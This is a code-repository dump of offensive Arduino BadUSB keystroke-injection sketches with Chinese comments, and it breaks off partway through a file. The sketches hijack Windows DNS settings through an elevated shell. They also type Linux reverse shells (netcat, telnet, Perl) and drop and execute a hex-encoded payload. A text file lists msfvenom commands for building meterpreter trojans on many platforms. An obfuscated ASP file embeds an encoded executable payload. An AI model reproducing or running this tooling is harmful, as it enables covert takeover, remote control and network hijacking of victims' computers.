    "content": "void setup() {\n  Keyboard.begin();//开始键盘通讯 \n  delay(3000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"cmd /c netsh interface ip set dns \\\"Local Area Connection\\\" static 127.0.0.1-192.168.1.1&&netsh interface ip set dns \\\"????\\\" static 127.0.0.1-192.168.1.1\");  //DOS命令设置多个DNS\n  Keyboard.end();\n}\nvoid loop() {\n}\n"
  },
  {
    "path": "DNSHijack/PSL_CommandSetMultipleDNS(DNSHijack).ino",
    "content": "void setup(){\n  Keyboard.begin();\n  delay(3000);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.println(\"POWERSHELL.EXE -C START-PROCESS POWERSHELL -VERB RUNAS\");\n  Keyboard.println();\n  delay(1000);\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.print('y');\n  Keyboard.release(KEY_LEFT_ALT);\n  delay(500);\n  Keyboard.println(\"CMD\");\n  delay(50);\n  Keyboard.println(\"NETSH INTERFACE IP SET DNS \\\"lOCAL aREA cCONNECTION\\\" STATIC 127.0.0.1-192.168.1.1&&EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\n\nvoid loop(){\n}\n"
  },
  {
    "path": "LICENSE",
    "content": "BSD 3-Clause License\n\nCopyright (c) 2021, wwy\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n  list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n  this list of conditions and the following disclaimer in the documentation\n  and/or other materials provided with the distribution.\n\n* Neither the name of the copyright holder nor the names of its\n  contributors may be used to endorse or promote products derived from\n  this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n"
  },
  {
    "path": "Linux_Built-inReverseShell/LinuxReverseShell (CodeExecution).ino",
    "content": "\n\nvoid setup()\n{\n  delay(5000);\n  terminal();\n  delay(3000);\n  Keyboard.println(\"echo INPUT0 > /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT1 >> /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT2 >> /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT3 >> /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT4 >> /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT5 >> /tmp/pay\");\n  delay(100);\n  Keyboard.println(\"echo INPUT6 >> /tmp/pay\");\n  delay(2000);\n  Keyboard.println(\"xxd -r -p /tmp/pay /tmp/payload\");\n  delay(2000);\n  Keyboard.println(\"chmod +x /tmp/payload\");\n  Keyboard.println(\"/tmp/payload &\");\n  delay(2000);\n  Keyboard.println(\"exit\");\n  \n}\n\nvoid loop()\n{\n   \n}\n\nvoid terminal()\n{\n  Keyboard.set_modifier(MODIFIERKEY_CTRL);\n  Keyboard.send_now();\n  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);\n  Keyboard.send_now();\n  Keyboard.set_key1(KEY_T);\n  Keyboard.send_now();\n  \n  delay(100);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now(); \n\n}\n"
  },
  {
    "path": "Linux_Built-inReverseShell/LinuxReverseShell(BashShell).ino",
    "content": "\n# define PAYLOAD1 \"mknod bp1 p && nc INPUT0 INPUT1 0<bp1 | /bin/bash 1>bp1 &\"\n//# define PAYLOAD2 \"/bin/bash -i > /dev/tcp/192.168.1.40/8080 0<&1 2>&1 &\" \n#define PAYLOAD3 \"mknod bp2 p && telnet INPUT2 INPUT3 0<bp2 | /bin/bash 1>bp2 &\"\n\nvoid setup()\n{\n  delay(5000);\n  terminal();\n  delay(3000);\n  Keyboard.println(PAYLOAD1);\n  delay(2000);\n  //Keyboard.println(PAYLOAD2);\n  //delay(2000);\n  Keyboard.println(PAYLOAD3);\n  delay(2000);\n  Keyboard.println(\"exit\");\n  \n}\n\nvoid loop()\n{\n   \n}\n\nvoid terminal()\n{\n  Keyboard.set_modifier(MODIFIERKEY_CTRL);\n  Keyboard.send_now();\n  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);\n  Keyboard.send_now();\n  Keyboard.set_key1(KEY_T);\n  Keyboard.send_now();\n  \n  delay(100);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now(); \n\n}\n\n"
  },
  {
    "path": "Linux_Built-inReverseShell/LinuxReverseShell(PerlShell).ino",
    "content": "\n\nvoid setup()\n{\n  delay(5000);\n  terminal();\n  delay(3000);\n  Keyboard.print(\"perl -MIO -e '$p=fork;exit,if\");\n  delay(100);\n  Keyboard.print(\"($p);$c=new IO::Socket::INET\");\n  delay(100);\n  Keyboard.print(\"(PeerAddr,\\\"INPUT0:INPUT1\\\"\");\n  delay(100);\n  Keyboard.print(\");STDIN->fdopen($c,r);$~->\");\n  delay(100);\n  Keyboard.print(\"fdopen($c,w);system$_ \");\n  delay(100);\n  Keyboard.println(\"while<>;'\");\n  delay(1000);\n  Keyboard.println(\"exit\");\n    \n}\n\nvoid loop()\n{\n   \n}\n\nvoid terminal()\n{\n  Keyboard.set_modifier(MODIFIERKEY_CTRL);\n  Keyboard.send_now();\n  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);\n  Keyboard.send_now();\n  Keyboard.set_key1(KEY_T);\n  Keyboard.send_now();\n  \n  delay(100);\n  Keyboard.set_modifier(0);\n  Keyboard.set_key1(0);\n  Keyboard.send_now(); \n\n}\n\n"
  },
  {
    "path": "MSF_Trojanlinkage/Shell_TrojanGenerationConfiguration.txt",
    "content": "\nIP192.168.43.242\nport4444\n\n\nexe木马：\nmsfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP> lport=<Your Port> -f exe -o shell.exe -e x86/shikata_ga_nai -i 8\n\njsp木马：\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.jsp\n\n#Powershell木马:\nmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f psh-reflection > shell.psl\n\n#JAVA木马:\nmsfvenom -p java/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f jar -o shell.jar\n\n#PHP木马:\nmsfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f raw -o shell.php\n\n#ASP木马:\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f asp > shell.asp\n\n#ASPX木马:\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f aspx > shell.aspx\n\n#Python木马:\nmsfvenom -p python/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f  raw > shell.py\n\n#Android木马:\nmsfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -o shell.apk\n\n#Bash木马:\nmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP> LPORT=<Your Port> -f raw > shell.sh\n\n#Linux木马：\nmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f elf > shell.elf\n\n#Mac木马：\nmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f macho > shell.macho\n\n#WAR木马：\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP> LPORT=<Your Port> -f war > shell.war\n\n#Perl木马：\nmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP LPORT=<Your Port> -f raw > shell.pl\n"
  },
  {
    "path": "MSF_Trojanlinkage/shell.asp",
    "content": "<% @language=\"VBScript\" %>\n<% \n\tSub gJjCrDeBtLBn()\n\t\twvWPLP=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(128)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(31)&Chr(186)&Chr(14)&Chr(0)&Chr(180)&Chr(9)&Chr(205)&Chr(33)&Chr(184)&Chr(1)&Chr(76)&Chr(205)&Chr(33)&Chr(84)&Chr(104)&Chr(105)&Chr(115)&Chr(32)&Chr(112)&Chr(114)&Chr(111)&Chr(103)&Chr(114)&Chr(97)&Chr(109)&Chr(32)&Chr(99)&Chr(97)&Chr(110)&Chr(110)&Chr(111)&Chr(116)&Chr(32)&Chr(98)&Chr(101)\nwvWPLP=wvWPLP&Chr(32)&Chr(114)&Chr(117)&Chr(110)&Chr(32)&Chr(105)&Chr(110)&Chr(32)&Chr(68)&Chr(79)&Chr(83)&Chr(32)&Chr(109)&Chr(111)&Chr(100)&Chr(101)&Chr(46)&Chr(13)&Chr(13)&Chr(10)&Chr(36)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(80)&Chr(69)&Chr(0)&Chr(0)&Chr(76)&Chr(1)&Chr(3)&Chr(0)&Chr(97)&Chr(144)&Chr(140)&Chr(129)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(224)&Chr(0)&Chr(15)&Chr(3)&Chr(11)&Chr(1)&Chr(2)&Chr(56)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(14)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(1)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(70)&Chr(58)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0
)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(100)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(46)&Chr(116)&Chr(101)&Chr(120)&Chr(116)&Chr(0)&Chr(0)&Chr(0)&Chr(40)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(48)&Chr(96)&Chr(46)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(0)&Chr(144)&Chr(10)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(0)&Chr(0)&Chr(12)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(32)&Chr(0)&Chr(48)&Chr(224)&Chr(46)&Chr(105)&Chr(100)&Chr(97)&Chr(116)&Chr(97)&Chr(0)&Chr(0)&Chr(100)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(48)&Chr(0)&Chr(0)&Chr(0)&Chr(2)&Chr(0)&Chr(0)&Chr(0)&Chr(16)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(64)&Chr(0)&Chr(48)&Chr(192)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(32)&Chr(64)&Chr(0)&Chr(255)&Chr(224)&Chr(144)&Chr(255)&Chr(37)&
Chr(56)&Chr(48)&Chr(64)&Chr(0)&Chr(144)&Chr(144)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&Chr(255)&Chr(255)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\n
wvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)\nwvWPLP=wvWPLP&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(190)&Chr(101)&Chr(81)&Chr(244)&Chr(228)&Chr(221)&Chr(199)&Chr(217)&Chr(116)&Chr(36)&Chr(244)&Chr(95)&Chr(49)&Chr(201)&Chr(102)&Chr(185)&Chr(4)&Chr(2)&Chr(49)&Chr(119)&Chr(21)&Chr(3)&Chr(119)&Chr(21)&Chr(131)&Chr(199)&Chr(97)&Chr(179)&Chr(1)&Chr(213)&Chr(169)&Chr(91)&Chr(226)&Chr(6)&Chr(105)&Chr(156)&Chr(150)&Chr(217)&Chr(89)&Chr(248)&Chr(223)&Chr(6)&Chr(101)&Chr(232)&Chr(98)&Chr(70
)&Chr(149)&Chr(233)&Chr(2)&Chr(206)&Chr(112)&Chr(216)&Chr(2)&Chr(180)&Chr(241)&Chr(75)&Chr(179)&Chr(190)&Chr(87)&Chr(96)&Chr(56)&Chr(146)&Chr(67)&Chr(243)&Chr(76)&Chr(59)&Chr(100)&Chr(180)&Chr(251)&Chr(29)&Chr(75)&Chr(69)&Chr(87)&Chr(93)&Chr(202)&Chr(197)\nwvWPLP=wvWPLP&Chr(170)&Chr(178)&Chr(44)&Chr(247)&Chr(100)&Chr(199)&Chr(45)&Chr(48)&Chr(152)&Chr(42)&Chr(127)&Chr(233)&Chr(214)&Chr(153)&Chr(111)&Chr(158)&Chr(163)&Chr(33)&Chr(4)&Chr(236)&Chr(34)&Chr(34)&Chr(249)&Chr(165)&Chr(69)&Chr(3)&Chr(172)&Chr(190)&Chr(31)&Chr(131)&Chr(79)&Chr(18)&Chr(20)&Chr(138)&Chr(87)&Chr(119)&Chr(17)&Chr(68)&Chr(236)&Chr(67)&Chr(237)&Chr(87)&Chr(36)&Chr(154)&Chr(14)&Chr(251)&Chr(9)&Chr(18)&Chr(253)&Chr(5)&Chr(78)&Chr(149)&Chr(30)&Chr(112)&Chr(166)&Chr(229)&Chr(163)&Chr(131)&Chr(125)&Chr(151)&Chr(127)&Chr(1)&Chr(101)&Chr(63)&Chr(11)&Chr(177)&Chr(65)&Chr(193)&Chr(216)&Chr(36)&Chr(2)&Chr(205)&Chr(149)&Chr(35)&Chr(76)&Chr(210)&Chr(40)&Chr(231)&Chr(231)&Chr(238)&Chr(161)&Chr(6)&Chr(39)&Chr(103)&Chr(241)&Chr(44)&Chr(227)&Chr(35)&Chr(161)&Chr(77)&Chr(178)&Chr(137)&Chr(4)&Chr(113)&Chr(164)&Chr(113)&Chr(248)&Chr(215)&Chr(175)&Chr(156)\nwvWPLP=wvWPLP&Chr(237)&Chr(101)&Chr(242)&Chr(200)&Chr(194)&Chr(71)&Chr(12)&Chr(9)&Chr(77)&Chr(223)&Chr(127)&Chr(59)&Chr(210)&Chr(75)&Chr(23)&Chr(119)&Chr(155)&Chr(85)&Chr(224)&Chr(14)&Chr(139)&Chr(101)&Chr(62)&Chr(168)&Chr(220)&Chr(155)&Chr(190)&Chr(201)&Chr(245)&Chr(95)&Chr(234)&Chr(153)&Chr(109)&Chr(73)&Chr(146)&Chr(113)&Chr(110)&Chr(118)&Chr(71)&Chr(239)&Chr(100)&Chr(224)&Chr(167)&Chr(88)&Chr(83)&Chr(2)&Chr(79)&Chr(155)&Chr(164)&Chr(243)&Chr(211)&Chr(18)&Chr(66)&Chr(163)&Chr(187)&Chr(116)&Chr(219)&Chr(4)&Chr(107)&Chr(53)&Chr(139)&Chr(236)&Chr(97)&Chr(186)&Chr(244)&Chr(13)&Chr(138)&Chr(16)&Chr(157)&Chr(164)&Chr(100)&Chr(205)&Chr(245)&Chr(80)&Chr(29)&Chr(84)&Chr(141)&Chr(193)&Chr(226)&Chr(66)&Chr(235)&Chr(194)&Chr(104)&Chr(103)&Chr(11)&Chr(140)&Chr(152)&Chr(2)&Chr(31)&Chr(249)&Chr(255)&Chr(236)&Chr(223)&Chr(250)&Chr(149)&Chr(236)&Chr(181)&Chr(254)&Chr(63)&Chr(186)
\nwvWPLP=wvWPLP&Chr(33)&Chr(253)&Chr(102)&Chr(140)&Chr(237)&Chr(254)&Chr(77)&Chr(142)&Chr(234)&Chr(1)&Chr(19)&Chr(167)&Chr(129)&Chr(52)&Chr(129)&Chr(135)&Chr(253)&Chr(56)&Chr(69)&Chr(8)&Chr(254)&Chr(110)&Chr(15)&Chr(8)&Chr(150)&Chr(214)&Chr(107)&Chr(91)&Chr(131)&Chr(24)&Chr(166)&Chr(207)&Chr(24)&Chr(141)&Chr(72)&Chr(166)&Chr(205)&Chr(6)&Chr(32)&Chr(68)&Chr(43)&Chr(96)&Chr(239)&Chr(183)&Chr(30)&Chr(242)&Chr(247)&Chr(72)&Chr(220)&Chr(221)&Chr(95)&Chr(33)&Chr(30)&Chr(94)&Chr(95)&Chr(177)&Chr(116)&Chr(94)&Chr(15)&Chr(217)&Chr(131)&Chr(113)&Chr(160)&Chr(41)&Chr(107)&Chr(88)&Chr(233)&Chr(33)&Chr(230)&Chr(13)&Chr(88)&Chr(211)&Chr(247)&Chr(7)&Chr(60)&Chr(77)&Chr(247)&Chr(164)&Chr(228)&Chr(126)&Chr(130)&Chr(197)&Chr(27)&Chr(127)&Chr(115)&Chr(204)&Chr(120)&Chr(127)&Chr(115)&Chr(240)&Chr(127)&Chr(67)&Chr(165)&Chr(201)&Chr(10)&Chr(130)&Chr(117)&Chr(110)&Chr(4)&Chr(177)\nwvWPLP=wvWPLP&Chr(216)&Chr(199)&Chr(142)&Chr(186)&Chr(79)&Chr(23)&Chr(155)&Chr(216)&Chr(243)&Chr(139)&Chr(45)&Chr(122)&Chr(3)&Chr(219)&Chr(41)&Chr(204)&Chr(172)&Chr(252)&Chr(226)&Chr(254)&Chr(31)&Chr(68)&Chr(176)&Chr(171)&Chr(187)&Chr(179)&Chr(7)&Chr(101)&Chr(40)&Chr(19)&Chr(241)&Chr(206)&Chr(233)&Chr(170)&Chr(162)&Ch